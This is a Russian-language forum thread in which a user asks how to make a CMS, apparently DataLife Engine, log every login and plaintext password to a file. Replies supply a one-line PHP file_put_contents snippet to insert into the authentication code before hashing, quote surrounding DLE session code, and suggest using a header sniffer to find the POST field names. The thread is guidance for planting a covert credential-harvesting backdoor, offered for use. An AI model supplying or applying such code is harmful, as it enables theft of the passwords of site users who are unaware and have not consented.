В общем, суть вопроса такая: Вот сайт с описанием данной штуки: http://krober.biz/?p=1239 Перед тем как читать дальше, клацните на ссылку выше. Как сделать так, чтобы при любой авторизации записывался в файл логин и пароль? (Без MD5, то есть чистый пароль) С этим кодом, получается подобная штука: Я точно не знаю, эти цифры 200: из-за чего они, и должно ли быть так.
В CMS ищешь файл где происходит авторизация пользователя или админа и записываешь данные до хэширования пароль. типо так file_put_contents('logpass.txt', $login.':'.$password); Всё.
C наскоку не получится, тут нужно хотя бы основы php знать и примерно понимать как устроен движок, чтобы в правильном месте код модифицировать чтобы он сохранял. Так что выводы напрашиваются сами.
200 это результат запроса скорее всего,не?тоже самое как возвращается 404 итд итп PHP: ///////Конец нашей вставки////////// $is_loged_in = true; $dle_login_hash = md5(SECURE_AUTH_KEY . $_SERVER['HTTP_HOST'] . $member_id['user_id'] . sha1($cmd5_password) . $config['key'] . date("Ymd")); if (!$_SESSION['dle_user_id'] and $_COOKIE['dle_user_id']) { session_regenerate_id(); $_SESSION['dle_user_id'] = $_COOKIE['dle_user_id']; $_SESSION['dle_password'] = $_COOKIE['dle_password']; } нафиг эта часть кода тебе?или я не прав?
Используй снифер заголовков. Как минимум можно узнать название post переменному сделать её поиск по исходникам, дальше плясать